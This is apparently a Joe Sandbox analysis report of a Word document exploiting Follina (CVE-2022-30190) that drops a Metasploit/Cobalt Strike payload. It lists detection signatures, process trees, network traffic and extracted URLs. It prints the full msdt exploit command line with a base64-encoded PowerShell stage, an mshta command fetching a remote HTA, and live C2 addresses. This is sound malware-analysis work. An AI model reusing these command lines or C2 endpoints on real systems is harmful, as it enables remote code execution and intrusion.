Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
V3g2Pfu707.docx

Overview

General Information

Sample Name:V3g2Pfu707.docx
Analysis ID:647003
MD5:b60cd79e2c14dbeefa22197f76fc3437
SHA1:07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9
SHA256:6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1
Tags:CVE-2022-30190docfollina
Infos:

Detection

Metasploit, Follina CVE-2022-30190
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Uses known network protocols on non-standard ports
Detected suspicious Microsoft Office reference URL
Contains an external reference to another file
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • WINWORD.EXE (PID: 6308 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 6532 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 7052 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4208 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6980 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 6940 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 3400 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • mshta.exe (PID: 5852 cmdline: "C:\Windows\system32\mshta.exe" http://159.75.135.162:61256/dllhost.hta MD5: 7083239CE743FDB68DFC933B7308E80A)
  • csc.exe (PID: 5532 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 6988 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • EXCEL.EXE (PID: 400 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 2396 cmdline: C:\Windows\\SysWOW64\\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
{"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}
SourceRuleDescriptionAuthorStrings
document.xml.relsSUSP_Doc_WordXMLRels_May22Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard, Wojciech Cieslak
  • 0x39:$a1: <Relationships
  • 0x552:$a2: TargetMode="External"
  • 0x54a:$x1: .html!
document.xml.relsINDICATOR_OLE_RemoteTemplateDetects XML relations where an OLE object is refrencing an external target in dropper OOXML documentsditekSHen
  • 0x507:$olerel: relationships/oleObject
  • 0x520:$target1: Target="http
  • 0x552:$mode: TargetMode="External
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htmEXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitationTobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        Click to see the 2 entries
        SourceRuleDescriptionAuthorStrings
        00000019.00000003.506676110.000000000626D000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2d8:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.499865318.0000000006E54000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0xf0:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.498703501.000000000583F000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x90e:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.500021102.0000000006E34000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2b78:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        00000019.00000003.500164196.0000000006E17000.00000004.00000800.00020000.00000000.sdmpCobaltbaltstrike_Payload_EncodedDetects CobaltStrike payloadsAvast Threat Intel Team
        • 0x2800:$s17: Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117
        Click to see the 170 entries
        No Sigma rule has matched
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: V3g2Pfu707.docxVirustotal: Detection: 33%Perma Link
        Source: V3g2Pfu707.docxReversingLabs: Detection: 29%
        Source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: Metasploit {"Headers": "Accept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nReferer: https://www.microsoft.com/\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_07_00) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\r\n", "Type": "Metasploit Download", "URL": "http://106.55.17.200/jquery-3.3.1.slim.min.js"}

        Exploits

        barindex
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000009.00000002.556693839.0000000000F50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.585006641.0000000003700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.582026384.0000000001080000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\exploit[1].htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\164F6553.htm, type: DROPPED
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BE8733D.htm, type: DROPPED
        Source: document.xml.relsExtracted files from sample: http://101.33.231.81:62563/exploit.html!
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

        Software Vulnerabilities

        barindex
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
        Source: global trafficTCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563
        Source: global trafficTCP traffic: 192.168.2.3:49749 -> 101.33.231.81:62563
        Source: winword.exeMemory has grown: Private usage: 0MB later: 95MB

        Networking

        barindex
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 62563
        Source: unknownNetwork traffic detected: HTTP traffic on port 62563 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 61256
        Source: unknownNetwork traffic detected: HTTP traffic on port 61256 -> 49781
        Source: Malware configuration extractorURLs: http://106.55.17.200/jquery-3.3.1.slim.min.js
        Source: Joe Sandbox ViewASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /exploit.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 101.33.231.81:62563If-Modified-Since: Tue, 14 Jun 2022 15:37:10 GMT; length=5737Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /dllhost.hta HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 159.75.135.162:61256Connection: Keep-Alive
        Source: global trafficTCP traffic: 192.168.2.3:49746 -> 101.33.231.81:62563
        Source: global trafficTCP traffic: 192.168.2.3:49781 -> 159.75.135.162:61256
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: unknownTCP traffic detected without corresponding DNS query: 101.33.231.81
        Source: ~WRS{9C7F191B-1B19-4530-878D-79768D2CF994}.tmp.0.drString found in binary or memory: http://101.33.231.81:62563/exploit.html
        Source: mshta.exe, 00000019.00000002.559346713.0000000000A02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.hta
        Source: mshta.exe, 00000019.00000002.558415681.0000000000860000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaC:
        Source: mshta.exe, 00000019.00000002.559444903.0000000000A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaET4.C:
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaV
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaY
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htag
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaindowsINetCookiesF&
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htanation
        Source: mshta.exe, 00000019.00000002.559463077.0000000000A77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htaocess
        Source: mshta.exe, 00000019.00000002.561330610.0000000000D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://159.75.135.162:61256/dllhost.htata
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
        Source: rundll32.exe, 0000001E.00000002.557013921.0000000002E3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab3
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200/
        Source: rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/
        Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556560356.0000000002D6B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js
        Source: rundll32.exe, 0000001E.00000002.556915406.0000000002E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://106.55.17.200:62002/jquery-3.3.1.slim.min.js9
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.aadrm.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.aadrm.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.cortana.ai
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnostics.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.microsoftstream.com/api/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.office.net
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.onedrive.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://apis.live.net/v5.0/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com/v2
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.entity.
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
        Source: 898A9331-BC1B-4A2A-B9BD-B3DDAD1E4A76.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
